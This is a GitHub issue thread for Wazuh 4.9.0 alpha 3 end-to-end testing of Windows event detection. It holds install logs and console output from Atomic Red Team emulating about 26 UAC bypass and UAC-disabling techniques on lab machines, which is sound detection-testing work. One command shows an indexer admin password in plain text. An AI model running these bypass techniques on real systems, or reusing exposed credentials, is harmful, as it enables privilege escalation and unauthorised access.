### ISSUE TITLE
Release 4.9.0 - Alpha 3 - E2E UX tests - Windows events

### ISSUE THREAD

**Issue by davidjiglesias** [wazuh/wazuh#24844]
## End-to-End (E2E) Testing Guideline

- **Documentation:** Always consult the development documentation for the current stage tag at [this link](https://documentation-dev.wazuh.com/v4.9.0-alpha3/index.html). Be careful because some of the description steps might refer to a current version in production, always navigate using the current development documention for the stage under test. Also, visit the following [pre-release package guide](https://docs.google.com/document/d/1fW8koy8P8OMvcxzIOXWGDw9qmKlju-XuRHD-Bdv3uP4/edit) to understand how to modify certain links and urls for the correct testing of the development packages.
- **Test Requirements:** Ensure your test comprehensively includes a full stack and agent/s deployment as per the Deployment requirements, detailing the machine OS, installed version, and revision.
- **Deployment Options:** While deployments can be local (using VMs, Vagrant, etc) or on the aws-dev account, opt for local deployments when feasible. For AWS access, coordinate with the DevOps team through [this link](https://github.com/wazuh/internal-devel-requests/issues/new?assignees=&labels=level%2Ftask%2C+request%2Foperational%2C+type%2Fchange&projects=&template=operational--request.md&title=%3CTitle%3E).
- **External Accounts:** If tests require third-party accounts (e.g., GitHub, Azure, AWS, GCP), request the necessary access through the DevOps team [here](https://github.com/wazuh/internal-devel-requests/issues/new?assignees=&labels=level%2Ftask%2C+request%2Foperational%2C+type%2Fchange&projects=&template=operational--request.md&title=%3CTitle%3E).
- **Alerts:** Every test should generate a minimum of one end-to-end alert, from the agent to the dashboard, irrespective of test type.
- **Multi-node Testing:** For multi-node wazuh-manager tests, ensure agents are connected to both workers and the master node.
- **Package Verification:** Use the pre-release package that matches the current TAG you're testing. Confirm its version and revision.
- **Filebeat Errors:** If you encounter errors with Filebeat during testing, refer to [this Slack discussion](https://wazuh-team.slack.com/archives/C03BDG0K6JC/p1672168163537809) for insights and resolutions.
- **Known Issues:** Familiarize yourself with previously reported issues in the Known Issues section. This helps in identifying already recognized errors during testing.
- **Reporting New Issues:** Any new errors discovered during testing that aren't listed under Known Issues should be reported. Assign the issue to the corresponding team (QA if unsure), add the `Release testing` objective and `Urgent` priority. Communicate these to the team and QA via the c-release Slack channel.
- **Test Conduct:** It's imperative to be thorough in your testing, offering enough detail for reviewers. Incomplete tests might necessitate a redo.
- **Documentation Feedback:** Encountering documentation gaps, unclear guidelines, or anything that disrupts the testing or UX? Open an issue, especially if it's not listed under Known Issues. Please answer the feedback section, this is a mandatory step.
- **Format:** If this is your first time doing this, refer to the format (but not necessarily the content, as it may vary) of previous E2E tests, here you have an example https://github.com/wazuh/wazuh/issues/13994.
- **Status and completion:** Change the issue status within your team project accordingly. Once you finish testing and write the conclusions, move it to Pending review and notify the @wazuh/devel-agent-div1 team via Slack using the [c-release channel](https://wazuh-team.slack.com/archives/C02A737S5MJ). Beware that the reviewers might request additional information or task repetitions.
- **For reviewers:** Please move the issue to Pending final review and notify via Slack using the same thread if everything is ok, otherwise, perform an issue update with the requested changes and move it to On hold, increase the review_cycles in the  team project by one and notify the issue assignee via Slack using the same thread.

For the conclusions and the issue testing and updates, use the following legend:

**Status legend**
- 🟢 All checks passed
- 🟡 Found a known issue
- 🔴 Found a new error

## Issue delivery and completion
- **Initial delivery:** The issue's assignee must complete the testing and deliver the results by Jul 24, 2024 and notify the @wazuh/devel-agent-div1 team via Slack using the [c-release channel](https://wazuh-team.slack.com/archives/C02A737S5MJ)
- **Review:** The @wazuh/devel-agent-div1 team will assign a reviewer and add it to the `review_assignee` field in the  project. The reviewer must then review the test steps and results. Ensure that all iteration cycles are completed by Jul 25, 2024 date (issue must be in `Pending final review` status) and notify the QA team via Slack using the [c-release channel](https://wazuh-team.slack.com/archives/C02A737S5MJ).
- **Auditor:** The QA team must audit, validate the results, and close the issue by Jul 26, 2024.

## Deployment requirements

| Component | Installation | Type | OS |
|----------|--------------|------|----|
| Indexer | [Installation assistant](https://documentation-dev.wazuh.com/v4.9.0-alpha3/installation-guide/wazuh-indexer/installation-assistant.html) | Single node | Oracle Linux 9 x86_64 |
| Server | [Installation assistant](https://documentation-dev.wazuh.com/v4.9.0-alpha3/installation-guide/wazuh-server/installation-assistant.html) | Multi node | Oracle Linux 9 x86_64 |
| Dashboard | [Installation assistant](https://documentation-dev.wazuh.com/v4.9.0-alpha3/installation-guide/wazuh-dashboard/installation-assistant.html) | - | Oracle Linux 9 x86_64 |
| Agent | [Wazuh WUI one-liner deploy using IP and GROUP (created beforehand, don't use default)](https://documentation-dev.wazuh.com/v4.9.0-alpha3/_images/deploy-new-agent-from-ui1.png) | - | Windows Server 2022 x86_64, Windows 11 x86_64 |

## Test description

Test that Windows data collection works out of the box. 
Check that for the same Windows events, the alert rule IDs are the same as in the previous version.
Test the following blog post:
https://wazuh.com/blog/emulation-of-attck-techniques-and-detection-with-wazuh/
Install sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post (use the current release under test instead of 4.2.0)
Use the blogpost as a mere guide for testing some Windows events and the use cases, do not report issues with the blogpost itself, outdated commands, etc.

## Known issues

- https://github.com/wazuh/wazuh-dashboard-plugins/issues/3925
- https://github.com/wazuh/wazuh-dashboard-plugins/issues/3927
- https://github.com/wazuh/wazuh-documentation/issues/4986
- https://github.com/wazuh/wazuh/issues/12977
- https://github.com/wazuh/wazuh-documentation/issues/5672

## Conclusions

Summarize the errors detected (Known Issues included). Illustrate using the table below. **REMOVE CURRENT EXAMPLES**:

| **Status**     | **Test**    | **Failure type**    | **Notes**      |
|----------------|-------------|---------------------|----------------|
| 🟢  | Indexer installation with installation assistant |   |    |
| 🟢  | multi-node manager installation with installation assistant |   |    |
| 🟢  | dashboard installation with installation assistant |   |    |
| 🟢  | Agent installation (Windows Server 2022 x86_64) with WUI one-liner | | |
| 🟢  | Agent installation (Windows 11 x86_64) with WUI one-liner | | |
| 🟢  | Attack emulation with ART|   |   |
| 🟢  | Visualize events on dashboard|   |   |

## Feedback

We value your feedback. Please provide insights on your testing experience.

- Was the testing guideline clear? Were there any ambiguities?
  - **The testing guide was quite clear.**
- Did you face any challenges not covered by the guideline?
  - https://github.com/wazuh/wazuh-packages/issues/3056
  - Oracle Linux 9 firewall blocked the ports for the indexer - dashboard communication. It was solved with systemctl stop firewall.service
- Suggestions for improvement:
  - **Any**

## Reviewers validation

The criteria for completing this task is based on the validation of the conclusions and the test results by all reviewers.

All the checkboxes below must be marked in order to close this issue.
- [ ] @rauldpm
- [x] @wazuh/devel-agent-div1

**Comment by NahuFigueroa97** [comment]
# Install Indexer

```
[root@E2E-WINDOWS-SERVER vagrant]# curl -sO https://packages-dev.wazuh.com/4.9/wazuh-certs-tool.sh
[root@E2E-WINDOWS-SERVER vagrant]# curl -sO https://packages-dev.wazuh.com/4.9/config.yml
[root@E2E-WINDOWS-SERVER vagrant]# bash wazuh-install.sh --generate-config-files
24/07/2024 21:08:49 INFO: Starting Wazuh installation assistant. Wazuh version: 4.9.0
24/07/2024 21:08:49 INFO: Verbose logging redirected to /var/log/wazuh-install.log
24/07/2024 21:08:49 INFO: The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Ubuntu 16.04, 18.04, 20.04, 22.04.
24/07/2024 21:08:49 WARNING: The current system does not match with the list of recommended systems. The installation may not work properly.
24/07/2024 21:08:49 INFO: Verifying that your system meets the recommended minimum hardware requirements.
24/07/2024 21:08:49 INFO: --- Configuration files ---
24/07/2024 21:08:49 INFO: Generating configuration files.
24/07/2024 21:08:49 INFO: Generating the root certificate.
24/07/2024 21:08:50 INFO: Generating Admin certificates.
24/07/2024 21:08:50 INFO: Generating Wazuh indexer certificates.
24/07/2024 21:08:50 INFO: Generating Filebeat certificates.
24/07/2024 21:08:51 INFO: Generating Wazuh dashboard certificates.
24/07/2024 21:08:51 INFO: Created wazuh-install-files.tar. It contains the Wazuh cluster key, certificates, and passwords necessary for installation.
[root@E2E-WINDOWS-SERVER vagrant]# curl -sO https://packages-dev.wazuh.com/4.9/wazuh-install.sh
[root@E2E-WINDOWS-SERVER vagrant]# bash wazuh-install.sh --wazuh-indexer node-1
24/07/2024 21:09:57 INFO: Starting Wazuh installation assistant. Wazuh version: 4.9.0
24/07/2024 21:09:57 INFO: Verbose logging redirected to /var/log/wazuh-install.log
24/07/2024 21:09:57 INFO: The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Ubuntu 16.04, 18.04, 20.04, 22.04.
24/07/2024 21:09:57 WARNING: The current system does not match with the list of recommended systems. The installation may not work properly.
24/07/2024 21:09:57 INFO: Verifying that your system meets the recommended minimum hardware requirements.
24/07/2024 21:09:58 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 9200, 9300.
24/07/2024 21:09:59 INFO: Wazuh development repository added.
24/07/2024 21:09:59 INFO: --- Wazuh indexer ---
24/07/2024 21:09:59 INFO: Starting Wazuh indexer installation.
24/07/2024 21:12:52 INFO: Wazuh indexer installation finished.
24/07/2024 21:12:52 INFO: Wazuh indexer post-install configuration finished.
24/07/2024 21:12:52 INFO: Starting service wazuh-indexer.
24/07/2024 21:13:15 INFO: wazuh-indexer service started.
24/07/2024 21:13:15 INFO: Initializing Wazuh indexer cluster security settings.
24/07/2024 21:13:16 INFO: Wazuh indexer cluster initialized.
24/07/2024 21:13:16 INFO: Installation finished.

```

**Comment by NahuFigueroa97** [comment]
# Install components


## Indexer

```shellsession
[root@E2E-WINDOWS-SERVER vagrant]# curl -sO https://packages-dev.wazuh.com/4.9/wazuh-install.sh
[root@E2E-WINDOWS-SERVER vagrant]# curl -sO https://packages-dev.wazuh.com/4.9/config.yml
[root@E2E-WINDOWS-SERVER vagrant]# bash wazuh-install.sh --generate-config-files
24/07/2024 22:55:35 INFO: Starting Wazuh installation assistant. Wazuh version: 4.9.0
24/07/2024 22:55:35 INFO: Verbose logging redirected to /var/log/wazuh-install.log
24/07/2024 22:55:35 INFO: The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Ubuntu 16.04, 18.04, 20.04, 22.04.
24/07/2024 22:55:35 WARNING: The current system does not match with the list of recommended systems. The installation may not work properly.
24/07/2024 22:55:35 INFO: Verifying that your system meets the recommended minimum hardware requirements.
24/07/2024 22:55:36 INFO: --- Configuration files ---
24/07/2024 22:55:36 INFO: Generating configuration files.
24/07/2024 22:55:36 INFO: Generating the root certificate.
24/07/2024 22:55:36 INFO: Generating Admin certificates.
24/07/2024 22:55:36 INFO: Generating Wazuh indexer certificates.
24/07/2024 22:55:37 INFO: Generating Filebeat certificates.
24/07/2024 22:55:37 INFO: Generating Wazuh dashboard certificates.
24/07/2024 22:55:38 INFO: Created wazuh-install-files.tar. It contains the Wazuh cluster key, certificates, and passwords necessary for installation.
[root@E2E-WINDOWS-SERVER vagrant]# bash wazuh-install.sh --wazuh-indexer node-1
24/07/2024 22:55:42 INFO: Starting Wazuh installation assistant. Wazuh version: 4.9.0
24/07/2024 22:55:42 INFO: Verbose logging redirected to /var/log/wazuh-install.log
24/07/2024 22:55:42 INFO: The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Ubuntu 16.04, 18.04, 20.04, 22.04.
24/07/2024 22:55:42 WARNING: The current system does not match with the list of recommended systems. The installation may not work properly.
24/07/2024 22:55:43 INFO: Verifying that your system meets the recommended minimum hardware requirements.
24/07/2024 22:55:43 WARNING: The system has Firewalld enabled. Please ensure that traffic is allowed on these ports: 9200, 9300.
24/07/2024 22:55:45 INFO: Wazuh development repository added.
24/07/2024 22:55:45 INFO: --- Wazuh indexer ---
24/07/2024 22:55:45 INFO: Starting Wazuh indexer installation.
24/07/2024 22:58:27 INFO: Wazuh indexer installation finished.
24/07/2024 22:58:28 INFO: Wazuh indexer post-install configuration finished.
24/07/2024 22:58:28 INFO: Starting service wazuh-indexer.
24/07/2024 22:58:50 INFO: wazuh-indexer service started.
24/07/2024 22:58:50 INFO: Initializing Wazuh indexer cluster security settings.
24/07/2024 22:58:51 INFO: Wazuh indexer cluster initialized.
24/07/2024 22:58:51 INFO: Installation finished.
[root@E2E-WINDOWS-SERVER vagrant]# bash wazuh-install.sh --start-cluster
24/07/2024 23:00:18 INFO: Starting Wazuh installation assistant. Wazuh version: 4.9.0
24/07/2024 23:00:18 INFO: Verbose logging redirected to /var/log/wazuh-install.log
24/07/2024 23:00:18 INFO: The recommended systems are: Red Hat Enterprise Linux 7, 8, 9; CentOS 7, 8; Amazon Linux 2; Ubuntu 16.04, 18.04, 20.04, 22.04.
24/07/2024 23:00:18 WARNING: The current system does not match with the list of recommended systems. The installation may not work properly.
24/07/2024 23:00:19 INFO: Verifying that your system meets the recommended minimum hardware requirements.
24/07/2024 23:00:25 INFO: Wazuh indexer cluster security configuration initialized.
24/07/2024 23:01:51 INFO: Updating the internal users.
24/07/2024 23:01:55 INFO: A backup of the internal users has been saved in the /etc/wazuh-indexer/internalusers-backup folder.
24/07/2024 23:02:07 INFO: Wazuh indexer cluster started.
[root@E2E-WINDOWS-SERVER vagrant]# curl -k -u admin:*WdVOYe2A.6wFsfMPe0lTDFfeORWkAj0 https://192.168.1.38:9200
{
  "name" : "node-1",
  "cluster_name" : "wazuh-indexer-cluster",
  "cluster_uuid" : "B3LnftfzQ6uyzkFzHayPXg",
  "version" : {
    "number" : "7.10.2",
    "build_type" : "rpm",
    "build_hash" : "2c952aba7735bee5f4b0bb9cfc821d68ffbdd636",
    "build_date" : "2024-07-19T16:30:35.251438Z",
    "build_snapshot" : false,
    "lucene_version" : "9.10.0",
    "minimum_wire_compatibility_version" : "7.10.0",
    "minimum_index_compatibility_version" : "7.0.0"
  },
  "tagline" : "The OpenSearch Project: https://opensearch.org/"
}
[root@E2E-WINDOWS-SERVER vagrant]# curl -k -u admin:*WdVOYe2A.6wFsfMPe0lTDFfeORWkAj0 https://192.168.1.38:9200/_cat/nodes?v
ip           heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                               cluster_manager name
192.168.1.38           54          89   5    0.14    0.32     0.24 dimr      data,ingest,master,remote_cluster_client *               node-1

```

**Comment by NahuFigueroa97** [comment]
## Agents

![Captura desde 2024-07-25 18-49-51](https://github.com/user-attachments/assets/8bbb5f65-0356-4171-a718-eb455e6ec738)

**Comment by NahuFigueroa97** [comment]
# Testing

<details> <summary> Windows 11 🟢</summary>

1. Invoke-AtomicTest T1548.002
```
PS C:\Program Files (x86)\ossec-agent> Invoke-AtomicTest T1548.002                                                      PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                          
Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout
La operación se completó correctamente.
Microsoft Windows [Versión 10.0.22631.3085]                                                                             (c) Microsoft Corporation. Todos los derechos reservados.                                                               C:\Users\usuario\AppData\Local\Temp>                                                                                    Exit code: 0                                                                                                            Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                    Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                                  Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open                                                             Name                           Property                                                                                 ----                           --------                                                                                 command
Exit code: 0
Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing test: T1548.002-3 Bypass UAC using Fodhelper
                                                                                Exit code: 0                                                                                                            Done executing test: T1548.002-3 Bypass UAC using Fodhelper                                                             Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                                     Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                         Name                           Property                                                                                 ----                           --------                                                                                 command                                                                                                                 DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open         PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry
Exit code: 0
Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open                                                         Name                           Property                                                                                 ----                           --------                                                                                 command                                                                                                                 DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open         PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry                                                                    Exit code: 0                                                                                                            Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                         Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                                   1 archivo(s) copiado(s).                                                                                                vínculo simbólico creado para c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe                                Exit code: 0                                                                                                            Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                              Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                      Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open                                                              Name                           Property                                                                                 ----                           --------                                                                                 command                        (default) : cmd.exe /c notepad.exe                                                       DelegateExecute :                                                                                                       PSPath          : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command      PSParentPath    : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open              PSChildName     : command                                                                                               PSDrive         : HKCU                                                                                                  PSProvider      : Microsoft.PowerShell.Core\Registry                                                                    Exit code: 0                                                                                                            Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                                 Executing test: T1548.002-8 Disable UAC using reg.exe                                                                   La operación se completó correctamente.                                                                                 Exit code: 0                                                                                                            Done executing test: T1548.002-8 Disable UAC using reg.exe                                                              Executing test: T1548.002-9 Bypass UAC using SilentCleanup task                                                         La pantalla no puede tener el n·mero de lÝneas y columnas especificado.                                                 La operación se completó correctamente.                                                                                 Exit code: 0                                                                                                            Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task                                                    Executing test: T1548.002-10 UACME Bypass Method 23                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-10 UACME Bypass Method 23                                                                Executing test: T1548.002-11 UACME Bypass Method 31
Exit code: 1073741845
Done executing test: T1548.002-11 UACME Bypass Method 31
Executing test: T1548.002-12 UACME Bypass Method 33
Exit code: 1073741845
Done executing test: T1548.002-12 UACME Bypass Method 33
Executing test: T1548.002-13 UACME Bypass Method 34
Exit code: 1073741845
Done executing test: T1548.002-13 UACME Bypass Method 34
Executing test: T1548.002-14 UACME Bypass Method 39
Exit code: 1073741845
Done executing test: T1548.002-14 UACME Bypass Method 39
Executing test: T1548.002-15 UACME Bypass Method 56
Exit code: 1073741845
Done executing test: T1548.002-15 UACME Bypass Method 56
Executing test: T1548.002-16 UACME Bypass Method 59
Exit code: 1073741845
Done executing test: T1548.002-16 UACME Bypass Method 59
Executing test: T1548.002-17 UACME Bypass Method 61                                                                     Exit code: 1073741845                                                                                                   Done executing test: T1548.002-17 UACME Bypass Method 61                                                                Executing test: T1548.002-18 WinPwn - UAC Magic                                                                         Creating/Checking Log Folders in  C:\Users\usuario\AppData\Local\Temp directory:                                            Directorio: C:\Users\usuario\AppData\Local\Temp                                                                     Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         25/7/2024     16:42                LocalRecon
d-----         25/7/2024     16:42                DomainRecon
    Directorio: C:\Users\usuario\AppData\Local\Temp\DomainRecon
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         25/7/2024     16:42                ADrecon
    Directorio: C:\Users\usuario\AppData\Local\Temp
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         25/7/2024     16:42                LocalPrivEsc
d-----         25/7/2024     16:42                Exploitation
d-----         25/7/2024     16:42                Vulnerabilities

_        __       __
\ \      / () _ |  _ \_      _ __
 \ \ /\ / /| | '_ \| |) \ \ /\ / | ' \
  \ V  V / | | | | |  __/ \ V  V /| | | |
   \/\/  ||| |||     \/\/ || ||                                                                                  --> UAC Bypass                                                                                                       [!] Session is elevated!                                                                                                Add-Type : (0) : cannot open C:\Users\usuario\AppData\Local\Temp\RES6440.tmp for writing                                (1) :   using System;                                                                                                   En línea: 10 Carácter: 2                                                                                                +     Add-Type -TypeDefinition $([Text.Encoding]::Unicode.GetString([Co ...                                             +     ~~~~~~~~~~~~~~~~~~~~~~~                                                     + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except     ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : (0) : 'c:\Users\usuario\AppData\Local\Temp\xej4dosh\CSC5CA01531C7C14D6FBB2CF949B1E7A95A.TMP' no es un
archivo de recursos Win32 válido
(1) :   using System;
En línea: 10 Carácter: 2
+     Add-Type -TypeDefinition $([Text.Encoding]::Unicode.GetString([Co ...
+     ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except     ion                                                                                                                      + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand                                                                                                                                                    Add-Type : No se puede agregar el tipo. Se produjeron errores de compilación.                                           En línea: 10 Carácter: 2                                                                                                +     Add-Type -TypeDefinition $([Text.Encoding]::Unicode.GetString([Co ...                                             +     ~~~~~~~~~~~~~~~~~~~~~~~                                                     + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException                                        + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand
Exit code: 0
Done executing test: T1548.002-18 WinPwn - UAC Magic                                                                    Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique                                                       Creating/Checking Log Folders in  C:\Users\usuario\AppData\Local\Temp directory:                                                                                                                                                                _        __       __                                                                                                \ \      / () _ |  _ \_      _ _                                                                                  \ \ /\ / /| | ' \| |) \ \ /\ / | ' \                                                                                  \ V  V / | | | | |  _/ \ V  V /| | | |                                                                                  \/\/  ||| |||     \/\/ || ||                                                                                  --> UAC Bypass                                                                                                       Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName                                                   -------  ------    -----      -----     ------     --  -- -----------                                                        22       2      420       2168       0,03   9376   1 cmstp                                                         True                                                                                                                    True                                                                                                                    Process : cmstp                                                                                                         Hwnd    : 328646                                                                                                        Exit code: 0                                                                                                            Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique                                                  Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique                                                  Creating/Checking Log Folders in  C:\Users\usuario\AppData\Local\Temp directory:                                                                                                                                                                _        _       __                                                                                                \ \      / () _ |  _ \_      _ _                                                                                  \ \ /\ / /| | ' \| |) \ \ /\ / | ' \                                                                                  \ V  V / | | | | |  _/ \ V  V /| | | |                                                                                  \/\/  ||| |||     \/\/ || |_|                                                                                  --> UAC Bypass                                                                                                       Exit code: 0                                                                                                            Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Exit code: 0
Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Exit code: 0
Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Exit code: 0
Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Exit code: 0
Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing test: T1548.002-25 Disable UAC notification via registry keys
La operación se completó correctamente.
Exit code: 0
Done executing test: T1548.002-25 Disable UAC notification via registry keys
Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
Exit code: 0
Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
2. Invoke-AtomicTest T1548.002 -Cleanup

```
PS C:\Program Files (x86)\ossec-agent> Invoke-AtomicTest T1548.002 -Cleanup                                             PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                  Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                             Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                        Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                      Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)                                 Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper                                                      Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper                                                 Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                         Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell                                    Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                                  Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)                             Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                       Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories                                  Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                          Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute                                     Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe                                                       La operación se completó correctamente.                                                                                 Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe                                                  Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task                                             Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task                                        Executing cleanup for test: T1548.002-10 UACME Bypass Method 23                                                         Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23                                                    Executing cleanup for test: T1548.002-11 UACME Bypass Method 31                                                         Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31                                                    Executing cleanup for test: T1548.002-12 UACME Bypass Method 33                                                         Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33                                                    Executing cleanup for test: T1548.002-13 UACME Bypass Method 34                                                         Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34                                                    Executing cleanup for test: T1548.002-14 UACME Bypass Method 39                                                         Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39                                                    Executing cleanup for test: T1548.002-15 UACME Bypass Method 56                                                         Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56                                                    Executing cleanup for test: T1548.002-16 UACME Bypass Method 59                                                         Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59                                                    Executing cleanup for test: T1548.002-17 UACME Bypass Method 61                                                         Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61                                                    Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic                                                             Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key
Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification
Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key
Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
La operación se completó correctamente.
Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys
Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
La operación se completó correctamente.
Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys
```
![Captura desde 2024-07-25 16-49-22](https://github.com/user-attachments/assets/9ca701fd-6bed-4cb1-b1dd-adc8d4ef2fd4)

![Captura desde 2024-07-25 19-11-55](https://github.com/user-attachments/assets/4b767acd-bff7-44d5-b401-9b556b3d36f5)

<details> <summary> Windows Server 2022 🟢</summary>

1. Invoke-AtomicTest T1548.002
```
PS C:\Users\vagrant\Downloads> Invoke-AtomicTest T1548.002                                                              PathToAtomicsFolder = C:\AtomicRedTeam\atomics                                                                                                                                                                                                  Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)                                                         Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout                               The operation completed successfully.                                                                                   Microsoft Windows [Version 10.0.20348.2402]                                                                             (c) Microsoft Corporation. All rights reserved.
C:\Users\vagrant\AppData\Local\Temp>
Exit code: 0
Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
